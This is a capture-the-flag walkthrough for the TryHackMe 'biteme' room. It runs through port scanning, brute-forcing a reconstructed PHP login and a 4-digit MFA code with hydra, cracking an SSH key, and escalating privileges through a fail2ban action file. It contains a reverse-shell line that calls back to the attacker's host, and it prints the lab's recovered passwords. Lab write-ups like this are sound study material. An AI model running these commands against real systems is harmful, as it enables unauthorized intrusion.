biteme

Room Link: https://tryhackme.com/room/biteme

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/console -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x phps

Finding username

Kali

echo 6a61736f6e5f746573745f6163636f756e74 | xxd -r -p

Recreating login

I merged configs.phps, functions.php and index.phps into a index.php file. Made some modifications so that it could run when hosted locally without the mfa part of the code so then I can try to bruteforce the credentials.

index.php

 <?php
session_start();
$showError = false;
define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74'); 

function is_valid_user($user) {
    $user = bin2hex($user);
    return $user === LOGIN_USER;
}
// @fred let's talk about ways to make this more secure but still flexible
function is_valid_pwd($pwd) {
    $hash = md5($pwd);
    return substr($hash, -3) === '001';
} 


if (isset($_POST['user']) && isset($_POST['pwd'])) {
        if (is_valid_user($_POST['user']) && is_valid_pwd($_POST['pwd'])) {
            setcookie('user', $_POST['user'], 0, '/');
            setcookie('pwd', $_POST['pwd'], 0, '/');
            header('Location: mfa.php');
            exit();
        } else {
            $showError = true;
        }
  }  
?>

<!doctype html>
<html lang="en">
 <body class="text-center">
    <form action="index.php" method="post" class="form-signin" >
        <h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
        <input type="text" name="user" class="form-control" placeholder="Username" required>
        <input type="password" name="pwd" class="form-control" placeholder="Password" required>
        <button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
        <?php if ($showError): ?><p class="mt-3 mb-3 text-danger">Incorrect details</p><?php endif ?>
    </form>
  </body>
</html>

Kali

echo MFA > mfa.php
php -S 127.0.0.1:81

Bruteforce

Kali

hydra -l jason_test_account -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 81 http-post-form "/index.php:user=^USER^&pwd=^PASS^:F=Incorrect details"

Browser

Username: jason_test_account
Password: violet

Kali

python -c "with open('output.txt', 'w') as file: [file.write(f'{str(i).zfill(4)}\n') for i in range(10000)]"

Kali

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install
cd ..

thc-hydra/hydra -l jason_test_account -P output.txt $VICTIM http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=hshqcs3n42r9qjs5b2850r9alt; user=jason_test_account; pwd=violet:F=Incorrect code" -T 64

LFI

Kali

chmod 600
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

TCP/22 - SSH

Kali

ssh -i id_rsa jason@$VICTIM 
Password: 1a2b3c4d

Lateral Movement

Victim

sudo -l

Victim

echo '#!/bin/bash' > shell.sh
echo 'sh -i >& /dev/tcp/$KALI/1337 0>&1' >> shell.sh

Kali

nc -lvnp 1338

Victim

sudo -u fred ./shell.sh

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Victim

sudo -l

Victim

cat /etc/fail2ban/jail.conf

Victim

ls -la /etc/fail2ban/action.d/iptables-multiport.conf
vi /etc/fail2ban/action.d/iptables-multiport.conf

Victim

sudo /bin/systemctl restart fail2ban

Now we need to enter bad passwords until we've triggerd the ban action

Kali

ssh root@$VICTIM

Victim

/bin/bash -p
whoami